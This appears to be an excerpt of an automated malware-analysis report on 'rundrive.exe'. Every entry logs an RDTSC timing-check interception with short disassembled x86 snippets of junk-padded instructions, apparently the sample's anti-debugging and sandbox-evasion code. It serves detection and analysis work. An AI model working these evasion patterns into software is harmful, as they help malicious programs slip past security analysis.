Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5E8049 second address: 5E806D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b jmp 00007FDA80C026C2h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push edx 0x00000016 pop edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5E7738 second address: 5E774C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDA80C00880h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5E774C second address: 5E775B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDA80C026BBh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5E775B second address: 5E7767 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5E78E7 second address: 5E78FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 jnc 00007FDA80C026B6h 0x0000000e popad 0x0000000f push ecx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5EC86C second address: 5EC88A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C0087Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007FDA80C00878h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5ECB1B second address: 5ECB20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 57CC42 second address: 57CC4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FDA80C00876h 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 57CC4D second address: 57CC53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 57CC53 second address: 57CC71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C00882h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jp 00007FDA80C00876h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 57CC71 second address: 57CC75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5F1A7D second address: 5F1A81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5F1A81 second address: 5F1A85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5F1A85 second address: 5F1A9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push esi 0x0000000a pop esi 0x0000000b jg 00007FDA80C00876h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 pop edi 0x00000016 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5F1A9B second address: 5F1AA5 instructions: 0x00000000 rdtsc 0x00000002 js 00007FDA80C026B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5F206C second address: 5F2089 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDA80C00884h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5F2089 second address: 5F2093 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FDA80C026B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5F21BE second address: 5F21EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 js 00007FDA80C00886h 0x0000000d jne 00007FDA80C00876h 0x00000013 jmp 00007FDA80C0087Ah 0x00000018 je 00007FDA80C0087Ah 0x0000001e popad 0x0000001f push ebx 0x00000020 jnp 00007FDA80C0087Eh 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5F2B82 second address: 5F2B88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5F2B88 second address: 5F2BA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 jmp 00007FDA80C00881h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5F2BA2 second address: 5F2BCF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C026C8h 0x00000007 jmp 00007FDA80C026BEh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5F2BCF second address: 5F2BD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5F75AC second address: 5F75CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FDA80C026C4h 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e je 00007FDA80C026B6h 0x00000014 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5C8C21 second address: 5C8C5B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C00889h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FDA80C00885h 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pop edx 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5C8F42 second address: 5C8F48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5C8F48 second address: 5C8F4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5C8F4E second address: 5C8F52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5C91A2 second address: 5C91C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ecx 0x00000008 pushad 0x00000009 jmp 00007FDA80C00884h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5C936B second address: 5C936F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5C936F second address: 5C9380 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5C9380 second address: 5C9384 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5C95C2 second address: 5C95C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5C95C6 second address: 5C95CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5C9A22 second address: 5C9A27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5C9A27 second address: 5C9A46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007FDA80C026C1h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5C9A46 second address: 5C9A66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FDA80C00889h 0x0000000c rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5C9E0D second address: 5C9E1E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jnp 00007FDA80C026B6h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5C9E1E second address: 5C9E24 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5F6AC7 second address: 5F6ACD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5F6ACD second address: 5F6AD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5FD1ED second address: 5FD1FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FDA80C026B6h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5FBEE3 second address: 5FBEF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d pop eax 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5FC082 second address: 5FC09D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDA80C026C7h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5FC09D second address: 5FC0AD instructions: 0x00000000 rdtsc 0x00000002 jp 00007FDA80C00876h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5FC1FF second address: 5FC209 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FDA80C026B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5FC209 second address: 5FC20F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5FC20F second address: 5FC215 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5FC36A second address: 5FC36E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5FC4A3 second address: 5FC4AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5FC4AE second address: 5FC4BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FDA80C00876h 0x0000000a jnc 00007FDA80C00876h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5FC642 second address: 5FC66C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FDA80C026B6h 0x0000000a popad 0x0000000b jnl 00007FDA80C026CFh 0x00000011 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5FC66C second address: 5FC68A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDA80C0087Ah 0x00000008 pushad 0x00000009 popad 0x0000000a jo 00007FDA80C00876h 0x00000010 popad 0x00000011 jo 00007FDA80C0087Eh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5FCBEC second address: 5FCBF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5FCBF2 second address: 5FCC0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C00886h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 609C45 second address: 609C57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDA80C026BEh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 609C57 second address: 609C89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C00884h 0x00000007 jl 00007FDA80C00876h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 ja 00007FDA80C00882h 0x00000017 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 608A4D second address: 608A5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDA80C026BBh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 608A5C second address: 608A60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 608C1A second address: 608C1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 608F62 second address: 608F67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 608F67 second address: 608F6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 609379 second address: 60937E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 60937E second address: 6093B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007FDA80C026BCh 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FDA80C026C8h 0x00000012 jp 00007FDA80C026B6h 0x00000018 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 60969A second address: 60969F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 60969F second address: 6096C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C026C4h 0x00000007 push edx 0x00000008 jmp 00007FDA80C026BBh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 609939 second address: 60996F instructions: 0x00000000 rdtsc 0x00000002 jc 00007FDA80C0087Ah 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pushad 0x0000000d jp 00007FDA80C00876h 0x00000013 jmp 00007FDA80C0087Dh 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push ebx 0x0000001e jmp 00007FDA80C0087Bh 0x00000023 pushad 0x00000024 push edx 0x00000025 pop edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 60FFA0 second address: 60FFB0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jbe 00007FDA80C026B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 60FFB0 second address: 60FFB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 60FFB4 second address: 60FFBF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 60FA1D second address: 60FA23 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 60FB77 second address: 60FB7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 60FB7B second address: 60FB9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 jmp 00007FDA80C00888h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 616B04 second address: 616B23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007FDA80C026C2h 0x0000000a jl 00007FDA80C026B6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 6156D6 second address: 6156DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 6156DA second address: 6156E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 ja 00007FDA80C026B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 6156E6 second address: 6156F5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edx 0x00000004 pop edx 0x00000005 js 00007FDA80C00876h 0x0000000b pop edx 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5C9831 second address: 5C9835 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5C9835 second address: 5C9854 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 jc 00007FDA80C00891h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FDA80C0087Fh 0x00000015 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5C9854 second address: 5C9858 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5C9858 second address: 5C9899 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 mov edx, dword ptr [ebp+122D2E47h] 0x0000000d push 00000004h 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007FDA80C00878h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 00000015h 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 mov ecx, dword ptr [ebp+122D1F59h] 0x0000002f cld 0x00000030 nop 0x00000031 pushad 0x00000032 jp 00007FDA80C00878h 0x00000038 pushad 0x00000039 popad 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 5C9899 second address: 5C989D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 615C83 second address: 615C8A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 615C8A second address: 615CC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDA80C026C3h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FDA80C026C8h 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 615CC2 second address: 615CC8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 6167EF second address: 616801 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 pop ebx 0x00000008 jnp 00007FDA80C026BEh 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 61AC64 second address: 61AC71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 61AC71 second address: 61AC7D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 61AC7D second address: 61AC83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 61AF2A second address: 61AF38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 jns 00007FDA80C026B6h 0x0000000e rdtsc
